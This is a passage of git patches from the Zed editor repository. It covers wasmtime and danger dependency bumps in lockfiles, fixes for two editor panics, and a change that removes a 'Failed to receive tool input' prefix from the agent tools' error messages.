"registry+https://github.com/rust-lang/crates.io-index" -checksum = "bcb6f974fe739e98034b7e6ec6feb2ab399f4cde7207675f26138bd9a1d65720" +checksum = "6bc24aba0bfd3d39fa8f0012835bc4d4efc75b1350b5e519181319eb8bb306b2" [[package]] name = "wasmtime-internal-cranelift" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4047020866a80aa943e41133e607020e17562126cf81533362275272098a22b1" +checksum = "54eb7fc20c8692dc96148365d7a00a1b79fee810833c75bdf8ec073a46e4721a" dependencies = [ "anyhow", "cfg-if", @@ -20074,9 +20074,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-fiber" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7cd172b622993bb8f834f6ca3b7683dfdba72b12db0527824850fdec17c89e5a" +checksum = "30708e122dcc1e175c66345c209c01752ca0cd20c9021721b6f56968342e9dbe" dependencies = [ "anyhow", "cc", @@ -20090,9 +20090,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-jit-debug" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1287e310fef4c8759a6b5caa0d44eff9a03ebcd6c273729cc39ce3e321a9e26a" +checksum = "1eeaab071a646d9ae205266adf186c63fa6d077d36b0b33628dd6c3d321d3195" dependencies = [ "cc", "wasmtime-internal-versioned-export-macros", @@ -20100,9 +20100,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-jit-icache-coherence" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c02bca30ef670a31496d742d9facdbd0228debe766b1e9541655c0530ff5c953" +checksum = "09979561e6e4a17bf55722463b066ccb968f010ac6ec5d647e4dff19eddbb19e" dependencies = [ "anyhow", "cfg-if", @@ -20112,24 +20112,24 @@ dependencies = [ [[package]] name = "wasmtime-internal-math" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 
"fd3a1f51a037ae2c048f0d76d36e27f0d22276295496c44f16a251f24690e003" +checksum = "9193eb852e5c68aeb95a5ea7538c2bec503023169a0b24430224b4f1ded24988" dependencies = [ "libm", ] [[package]] name = "wasmtime-internal-slab" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ba6171aac3d66e4d69e50080bb6bc5205de2283513984a4118a93cb66dc02994" +checksum = "289bfa4fbb43f406f36166737f1f25522c215ef2ef11f98423089a6a7590a3d1" [[package]] name = "wasmtime-internal-unwinder" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3fd1bc1783391a02176fb687159b1779fc10b71d5350adf09c1f3aa8442a02cc" +checksum = "4e748c970993865d9bf474465c3f10f96e541c472bc8f7ec0b031779f4ac29c6" dependencies = [ "anyhow", "cfg-if", @@ -20140,9 +20140,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-versioned-export-macros" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8097e2c8ca02ed65d31dda111faa0888ffbf28dc3ee74355e283118a8d293eb0" +checksum = "e97e07438cb8b50df3bc9659c56757830a15235c94268dbbd54186524fd4ed84" dependencies = [ "proc-macro2", "quote", @@ -20151,9 +20151,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-winch" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6a8cb36b61fbcff2c8bcd14f9f2651a6e52b019d0d329324620d7bc971b2b235" +checksum = "107aa0c3f71cc590c786d6d6e09893558b383f4d78107b864a9fd978929d0244" dependencies = [ "anyhow", "cranelift-codegen", @@ -20168,9 +20168,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-wit-bindgen" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff555cfb71577028616d65c00221c7fe6eef45a9ebb96fc6d34d4a41fa1de191" +checksum = "eeb3d8e4efdaae10aa01264e9946bba507e53707125dd0aa8584b5e13229a3c0" 
dependencies = [ "anyhow", "bitflags 2.10.0", @@ -20181,9 +20181,9 @@ dependencies = [ [[package]] name = "wasmtime-wasi" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c3c2e99fbaa0c26b4680e0c9af07e3f7b25f5fbc1ad97dd34067980bd027d3e5" +checksum = "86fffc455304d2750ea2456394cdf6513d8771eb5b256876685b8bb9413bfb0e" dependencies = [ "anyhow", "async-trait", @@ -20212,9 +20212,9 @@ dependencies = [ [[package]] name = "wasmtime-wasi-io" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "de2dc367052562c228ce51ee4426330840433c29c0ea3349eca5ddeb475ecdb9" +checksum = "5666a220e8318309225b54a55b270e1b506385adcce10bf5698380441afa0df3" dependencies = [ "anyhow", "async-trait", @@ -20679,9 +20679,9 @@ dependencies = [ [[package]] name = "wiggle" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c13d1ae265bd6e5e608827d2535665453cae5cb64950de66e2d5767d3e32c43a" +checksum = "4e176546937d1311c7608276c8511d3ea9b8e7b916e89b720e12c4d4bbae067c" dependencies = [ "anyhow", "async-trait", @@ -20694,9 +20694,9 @@ dependencies = [ [[package]] name = "wiggle-generate" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "607c4966f6b30da20d24560220137cbd09df722f0558eac81c05624700af5e05" +checksum = "e3f012ad76133d9ac70633c7f954e289fb4c21986059f324fec3c476664ab643" dependencies = [ "anyhow", "heck 0.5.0", @@ -20708,9 +20708,9 @@ dependencies = [ [[package]] name = "wiggle-macro" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fc36e39412fa35f7cc86b3705dbe154168721dd3e71f6dc4a726b266d5c60c55" +checksum = "4301e6203d3d13eef139fa3aca5f04e9156b4a5f7636ca965b2c10bce410b3d2" dependencies = [ "proc-macro2", "quote", @@ -20751,9 +20751,9 @@ checksum = 
"712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "winch-codegen" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0989126b21d12c9923aa2de7ddbcf87db03037b24b7365041d9dd0095b69d8cb" +checksum = "646e2d01f59d7006e24a370762abfb63d5918696ff02197e027efd15252a1f79" dependencies = [ "anyhow", "cranelift-assembler-x64", From 241e5fdb1d1324ae12045107ef7e5af345ec7221 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 12:17:11 +0200 Subject: [PATCH 154/231] editor: Fix panic in `render_edit_prediction_cursor_popover` (#55604) Fixes ZED-72Z Release Notes: - Fixed a panic in edit predictions --- crates/editor/src/editor.rs | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index c1741cd6215807..a05876d2d9cdbc 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -9066,8 +9066,13 @@ impl Editor { } invalidation_row_range = move_invalidation_row_range.unwrap_or(edit_start_row..edit_end_row); - let target = first_edit_start; - EditPrediction::MoveWithin { target, snapshot } + + let (_, snapshot) = multibuffer.anchor_to_buffer_anchor(first_edit_start)?; + + EditPrediction::MoveWithin { + target: first_edit_start, + snapshot: snapshot.clone(), + } } else { let show_completions_in_menu = self.has_visible_completions_menu(); let show_completions_in_buffer = !self.edit_prediction_visible_in_cursor_popover(true) From 284eb3c7f7a52155c1ffe800420630a044321817 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 12:17:14 +0200 Subject: [PATCH 155/231] vim: Fix panic when pasting in read-only editor (#55608) Fixes ZED-73F Release Notes: - N/A or Added/Fixed/Improved ... 
--- crates/vim/src/helix/paste.rs | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/crates/vim/src/helix/paste.rs b/crates/vim/src/helix/paste.rs index c43281421462ee..c8db0722c2c147 100644 --- a/crates/vim/src/helix/paste.rs +++ b/crates/vim/src/helix/paste.rs @@ -28,6 +28,10 @@ impl Vim { // (none of the other helix_ methods call it) self.update_editor(cx, |vim, editor, cx| { + if editor.read_only(cx) { + return; + } + editor.transact(window, cx, |editor, window, cx| { editor.set_clip_at_line_ends(false, cx); @@ -201,6 +205,19 @@ mod test { cx.assert_state("«Xˇ»\n«Xˇ»\n«Xˇ»\nend", Mode::HelixNormal); } + #[gpui::test] + async fn test_read_only_paste(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + cx.set_state("aˇb", Mode::HelixNormal); + cx.write_to_clipboard(ClipboardItem::new_string("clipboard".to_string())); + cx.update_editor(|editor, _window, _cx| editor.set_read_only(true)); + + cx.simulate_keystrokes("p"); + + cx.assert_state("aˇb", Mode::HelixNormal); + } + #[gpui::test] async fn test_paste(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; From 983843234f34c6c6db2b274076a7e678ce45b873 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 12:27:33 +0200 Subject: [PATCH 156/231] agent: Better error messages when tool fails (#55616) Does not actually seem useful to the LLM to include `Failed to receive tool input: ...` in the error message. We now only include the actual error. 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/agent/src/tests/mod.rs | 10 +---- crates/agent/src/tests/test_tools.rs | 42 ++++--------------- .../src/tools/context_server_registry.rs | 2 +- crates/agent/src/tools/copy_path_tool.rs | 5 +-- .../agent/src/tools/create_directory_tool.rs | 5 +-- crates/agent/src/tools/delete_path_tool.rs | 5 +-- crates/agent/src/tools/diagnostics_tool.rs | 5 +-- crates/agent/src/tools/edit_file_tool.rs | 2 +- crates/agent/src/tools/fetch_tool.rs | 5 +-- crates/agent/src/tools/find_path_tool.rs | 2 +- crates/agent/src/tools/grep_tool.rs | 2 +- crates/agent/src/tools/list_directory_tool.rs | 2 +- crates/agent/src/tools/move_path_tool.rs | 2 +- crates/agent/src/tools/now_tool.rs | 5 +-- crates/agent/src/tools/open_tool.rs | 5 +-- .../src/tools/restore_file_from_disk_tool.rs | 5 +-- crates/agent/src/tools/save_file_tool.rs | 5 +-- crates/agent/src/tools/spawn_agent_tool.rs | 2 +- crates/agent/src/tools/terminal_tool.rs | 5 +-- crates/agent/src/tools/update_plan_tool.rs | 5 +-- crates/agent/src/tools/web_search_tool.rs | 2 +- 21 files changed, 30 insertions(+), 93 deletions(-) diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index 513ffce0fa9ab0..c2efda7673d6aa 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -4063,14 +4063,8 @@ async fn test_streaming_tool_completes_when_llm_stream_ends_without_final_input( tool_use_id: tool_use.id.clone(), tool_name: tool_use.name, is_error: true, - content: vec![ - "Failed to receive tool input: tool input was not fully received" - .into(), - ], - output: Some( - "Failed to 
receive tool input: tool input was not fully received" - .into() - ), + content: vec!["tool input was not fully received".into(),], + output: Some("tool input was not fully received".into()), } )], cache: true, diff --git a/crates/agent/src/tests/test_tools.rs b/crates/agent/src/tests/test_tools.rs index 750ea48dc85875..56a5733761c8e2 100644 --- a/crates/agent/src/tests/test_tools.rs +++ b/crates/agent/src/tests/test_tools.rs @@ -61,10 +61,7 @@ impl AgentTool for StreamingEchoTool { ) -> Task> { let wait_until_complete_rx = self.wait_until_complete_rx.lock().unwrap().take(); cx.spawn(async move |_cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; if let Some(rx) = wait_until_complete_rx { rx.await.ok(); } @@ -127,7 +124,7 @@ impl AgentTool for StreamingJsonErrorContextTool { )); } Err(error) => { - return Err(format!("Failed to receive tool input: {error}")); + return Err(error.to_string()); } } } @@ -220,10 +217,7 @@ impl AgentTool for EchoTool { cx: &mut App, ) -> Task> { cx.spawn(async move |_cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; Ok(input.text) }) } @@ -271,10 +265,7 @@ impl AgentTool for DelayTool { { let executor = cx.background_executor().clone(); cx.foreground_executor().spawn(async move { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; executor.timer(Duration::from_millis(input.ms)).await; Ok("Ding".to_string()) }) @@ -311,10 +302,7 @@ impl AgentTool for ToolRequiringPermission { cx: &mut App, ) -> Task> { cx.spawn(async move |cx| { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; 
let authorize = cx.update(|cx| { let context = crate::ToolPermissionContext::new(Self::NAME, vec![String::new()]); @@ -359,10 +347,7 @@ impl AgentTool for ToolRequiringPermission2 { cx: &mut App, ) -> Task> { cx.spawn(async move |cx| { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; let authorize = cx.update(|cx| { let context = crate::ToolPermissionContext::new(Self::NAME, vec![String::new()]); @@ -404,10 +389,7 @@ impl AgentTool for InfiniteTool { cx: &mut App, ) -> Task> { cx.foreground_executor().spawn(async move { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; future::pending::<()>().await; unreachable!() }) @@ -460,10 +442,7 @@ impl AgentTool for CancellationAwareTool { cx: &mut App, ) -> Task> { cx.foreground_executor().spawn(async move { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; // Wait for cancellation - this tool does nothing but wait to be cancelled event_stream.cancelled_by_user().await; self.was_cancelled.store(true, Ordering::SeqCst); @@ -519,10 +498,7 @@ impl AgentTool for WordListTool { cx: &mut App, ) -> Task> { cx.spawn(async move |_cx| { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; Ok("ok".to_string()) }) } diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 9948b587f4fcec..01601679c90fe8 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -350,7 +350,7 @@ impl AnyAgentTool for ContextServerTool { let input = input .recv() .await - 
.map_err(|e| anyhow::anyhow!(format!("Failed to receive tool input: {e}")))?; + .map_err(|e| anyhow::anyhow!(e.to_string()))?; authorize .await diff --git a/crates/agent/src/tools/copy_path_tool.rs b/crates/agent/src/tools/copy_path_tool.rs index b40f26bee7dec9..c26317979053ab 100644 --- a/crates/agent/src/tools/copy_path_tool.rs +++ b/crates/agent/src/tools/copy_path_tool.rs @@ -88,10 +88,7 @@ impl AgentTool for CopyPathTool { ) -> Task> { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let paths = vec![input.source_path.clone(), input.destination_path.clone()]; let decision = cx.update(|cx| { decide_permission_for_paths(Self::NAME, &paths, &AgentSettings::get_global(cx)) diff --git a/crates/agent/src/tools/create_directory_tool.rs b/crates/agent/src/tools/create_directory_tool.rs index 602b8809328072..da2b33fa5f9e39 100644 --- a/crates/agent/src/tools/create_directory_tool.rs +++ b/crates/agent/src/tools/create_directory_tool.rs @@ -77,10 +77,7 @@ impl AgentTool for CreateDirectoryTool { ) -> Task> { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let decision = cx.update(|cx| { decide_permission_for_path(Self::NAME, &input.path, AgentSettings::get_global(cx)) }); diff --git a/crates/agent/src/tools/delete_path_tool.rs b/crates/agent/src/tools/delete_path_tool.rs index 9e48d426411ea9..4e4747eb026a4e 100644 --- a/crates/agent/src/tools/delete_path_tool.rs +++ b/crates/agent/src/tools/delete_path_tool.rs @@ -81,10 +81,7 @@ impl AgentTool for DeletePathTool { let project = self.project.clone(); let action_log = self.action_log.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| 
format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let path = input.path; let decision = cx.update(|cx| { diff --git a/crates/agent/src/tools/diagnostics_tool.rs b/crates/agent/src/tools/diagnostics_tool.rs index a59f61ae97a187..1d6528007d0463 100644 --- a/crates/agent/src/tools/diagnostics_tool.rs +++ b/crates/agent/src/tools/diagnostics_tool.rs @@ -93,10 +93,7 @@ impl AgentTool for DiagnosticsTool { ) -> Task> { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; match input.path { Some(path) if !path.is_empty() => { diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 9d5f7953ffff96..e22436c7a80473 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -439,7 +439,7 @@ impl EditFileTool { }, Err(error) => { return EditSessionResult::Failed { - error: format!("Failed to receive tool input: {error}"), + error: error.to_string(), session, }; } diff --git a/crates/agent/src/tools/fetch_tool.rs b/crates/agent/src/tools/fetch_tool.rs index ca8e9a3697e6ff..716b4b364eed1e 100644 --- a/crates/agent/src/tools/fetch_tool.rs +++ b/crates/agent/src/tools/fetch_tool.rs @@ -143,10 +143,7 @@ impl AgentTool for FetchTool { ) -> Task> { let http_client = self.http_client.clone(); cx.spawn(async move |cx| { - let input: FetchToolInput = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input: FetchToolInput = input.recv().await.map_err(|e| e.to_string())?; let authorize = cx.update(|cx| { let context = diff --git a/crates/agent/src/tools/find_path_tool.rs b/crates/agent/src/tools/find_path_tool.rs index 66d127e756ca83..952996b9c89f66 100644 --- a/crates/agent/src/tools/find_path_tool.rs +++ 
b/crates/agent/src/tools/find_path_tool.rs @@ -128,7 +128,7 @@ impl AgentTool for FindPathTool { let project = self.project.clone(); cx.spawn(async move |cx| { let input = input.recv().await.map_err(|e| FindPathToolOutput::Error { - error: format!("Failed to receive tool input: {e}"), + error: e.to_string(), })?; let search_paths_task = cx.update(|cx| search_paths(&input.glob, project, cx)); diff --git a/crates/agent/src/tools/grep_tool.rs b/crates/agent/src/tools/grep_tool.rs index 485084a406e3f8..32d872f6578e35 100644 --- a/crates/agent/src/tools/grep_tool.rs +++ b/crates/agent/src/tools/grep_tool.rs @@ -126,7 +126,7 @@ impl AgentTool for GrepTool { let input = input .recv() .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + .map_err(|e| e.to_string())?; let results = cx.update(|cx| { let path_style = project.read(cx).path_style(cx); diff --git a/crates/agent/src/tools/list_directory_tool.rs b/crates/agent/src/tools/list_directory_tool.rs index 8431648b64a8a0..94e2a0b2eaf7ad 100644 --- a/crates/agent/src/tools/list_directory_tool.rs +++ b/crates/agent/src/tools/list_directory_tool.rs @@ -155,7 +155,7 @@ impl AgentTool for ListDirectoryTool { let input = input .recv() .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + .map_err(|e| e.to_string())?; // Sometimes models will return these even though we tell it to give a path and not a glob. // When this happens, just list the root worktree directories. 
diff --git a/crates/agent/src/tools/move_path_tool.rs b/crates/agent/src/tools/move_path_tool.rs index abf45a7ec1738f..629b40dbf7231b 100644 --- a/crates/agent/src/tools/move_path_tool.rs +++ b/crates/agent/src/tools/move_path_tool.rs @@ -104,7 +104,7 @@ impl AgentTool for MovePathTool { let input = input .recv() .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + .map_err(|e| e.to_string())?; let paths = vec![input.source_path.clone(), input.destination_path.clone()]; let decision = cx.update(|cx| { decide_permission_for_paths(Self::NAME, &paths, AgentSettings::get_global(cx)) diff --git a/crates/agent/src/tools/now_tool.rs b/crates/agent/src/tools/now_tool.rs index 9721c923b6e8d2..f8f4e0d91b5f0e 100644 --- a/crates/agent/src/tools/now_tool.rs +++ b/crates/agent/src/tools/now_tool.rs @@ -55,10 +55,7 @@ impl AgentTool for NowTool { cx: &mut App, ) -> Task> { cx.spawn(async move |_cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let now = match input.timezone { Timezone::Utc => Utc::now().to_rfc3339(), Timezone::Local => Local::now().to_rfc3339(), diff --git a/crates/agent/src/tools/open_tool.rs b/crates/agent/src/tools/open_tool.rs index dc72c758e36b04..7329965e6226e1 100644 --- a/crates/agent/src/tools/open_tool.rs +++ b/crates/agent/src/tools/open_tool.rs @@ -67,10 +67,7 @@ impl AgentTool for OpenTool { ) -> Task> { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; // If path_or_url turns out to be a path in the project, make it absolute. 
let (abs_path, initial_title) = cx.update(|cx| { diff --git a/crates/agent/src/tools/restore_file_from_disk_tool.rs b/crates/agent/src/tools/restore_file_from_disk_tool.rs index aaab281046435c..3b2c95596c3b2b 100644 --- a/crates/agent/src/tools/restore_file_from_disk_tool.rs +++ b/crates/agent/src/tools/restore_file_from_disk_tool.rs @@ -75,10 +75,7 @@ impl AgentTool for RestoreFileFromDiskTool { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; // Check for any immediate deny before doing async work. for path in &input.paths { diff --git a/crates/agent/src/tools/save_file_tool.rs b/crates/agent/src/tools/save_file_tool.rs index 8fe27fc350b1b8..f70420984157fa 100644 --- a/crates/agent/src/tools/save_file_tool.rs +++ b/crates/agent/src/tools/save_file_tool.rs @@ -72,10 +72,7 @@ impl AgentTool for SaveFileTool { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; // Check for any immediate deny before doing async work. 
for path in &input.paths { diff --git a/crates/agent/src/tools/spawn_agent_tool.rs b/crates/agent/src/tools/spawn_agent_tool.rs index cdb36126f5763d..5cb2f8c98cd92f 100644 --- a/crates/agent/src/tools/spawn_agent_tool.rs +++ b/crates/agent/src/tools/spawn_agent_tool.rs @@ -137,7 +137,7 @@ impl AgentTool for SpawnAgentTool { .await .map_err(|e| SpawnAgentToolOutput::Error { session_id: None, - error: format!("Failed to receive tool input: {e}"), + error: e.to_string(), session_info: None, })?; diff --git a/crates/agent/src/tools/terminal_tool.rs b/crates/agent/src/tools/terminal_tool.rs index ffbd4393bc92ec..34d19c581a40da 100644 --- a/crates/agent/src/tools/terminal_tool.rs +++ b/crates/agent/src/tools/terminal_tool.rs @@ -89,10 +89,7 @@ impl AgentTool for TerminalTool { cx: &mut App, ) -> Task> { cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let (working_dir, authorize) = cx.update(|cx| { let working_dir = diff --git a/crates/agent/src/tools/update_plan_tool.rs b/crates/agent/src/tools/update_plan_tool.rs index 39e88590b1872a..ebc84ad03186fc 100644 --- a/crates/agent/src/tools/update_plan_tool.rs +++ b/crates/agent/src/tools/update_plan_tool.rs @@ -90,10 +90,7 @@ impl AgentTool for UpdatePlanTool { cx: &mut App, ) -> Task> { cx.spawn(async move |_cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; event_stream.update_plan(Self::to_plan(input)); diff --git a/crates/agent/src/tools/web_search_tool.rs b/crates/agent/src/tools/web_search_tool.rs index 271829c626294a..2938cee3e1d80f 100644 --- a/crates/agent/src/tools/web_search_tool.rs +++ b/crates/agent/src/tools/web_search_tool.rs @@ -78,7 +78,7 @@ impl AgentTool for WebSearchTool { .recv() .await .map_err(|e| WebSearchToolOutput::Error { - error: 
format!("Failed to receive tool input: {e}"), + error: e.to_string(), })?; let authorize = cx.update(|cx| { From c80c4c0fd63da098884ba43e62c4d3de04ab8eac Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Mon, 4 May 2026 12:31:07 +0200 Subject: [PATCH 157/231] Update danger deps for CI (#55615) Release Notes: - N/A --- script/danger/package.json | 2 +- script/danger/pnpm-lock.yaml | 273 +++++++++++++++-------------------- 2 files changed, 115 insertions(+), 160 deletions(-) diff --git a/script/danger/package.json b/script/danger/package.json index be44da6233a1c5..b0c33a3f505909 100644 --- a/script/danger/package.json +++ b/script/danger/package.json @@ -7,7 +7,7 @@ "danger": "danger" }, "devDependencies": { - "danger": "13.0.4", + "danger": "13.0.7", "danger-plugin-pr-hygiene": "0.7.1" } } diff --git a/script/danger/pnpm-lock.yaml b/script/danger/pnpm-lock.yaml index eea293cfed78fc..197840ca3b8b43 100644 --- a/script/danger/pnpm-lock.yaml +++ b/script/danger/pnpm-lock.yaml @@ -9,8 +9,8 @@ importers: .: devDependencies: danger: - specifier: 13.0.4 - version: 13.0.4 + specifier: 13.0.7 + version: 13.0.7 danger-plugin-pr-hygiene: specifier: 0.7.1 version: 0.7.1 @@ -81,17 +81,13 @@ packages: '@octokit/types@13.10.0': resolution: {integrity: sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==} - '@tootallnate/once@2.0.0': - resolution: {integrity: sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==} - engines: {node: '>= 10'} + agent-base@7.1.4: + resolution: {integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==} + engines: {node: '>= 14'} - agent-base@6.0.2: - resolution: {integrity: sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==} - engines: {node: '>= 6.0.0'} - - ansi-styles@3.2.1: - resolution: {integrity: 
sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==} - engines: {node: '>=4'} + ansi-styles@4.3.0: + resolution: {integrity: sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==} + engines: {node: '>=8'} async-retry@1.2.3: resolution: {integrity: sha512-tfDb02Th6CE6pJUF2gjW5ZVjsgwlucVXOEQMvEX9JgSJMs9gAX+Nz3xRuJBKuUYjTSYORqvDBORdAQ3LU59g7Q==} @@ -114,15 +110,16 @@ packages: resolution: {integrity: sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg==} engines: {node: '>= 0.4'} - chalk@2.4.2: - resolution: {integrity: sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==} - engines: {node: '>=4'} + chalk@4.1.2: + resolution: {integrity: sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==} + engines: {node: '>=10'} - color-convert@1.9.3: - resolution: {integrity: sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==} + color-convert@2.0.1: + resolution: {integrity: sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==} + engines: {node: '>=7.0.0'} - color-name@1.1.3: - resolution: {integrity: sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==} + color-name@1.1.4: + resolution: {integrity: sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==} colors@1.4.0: 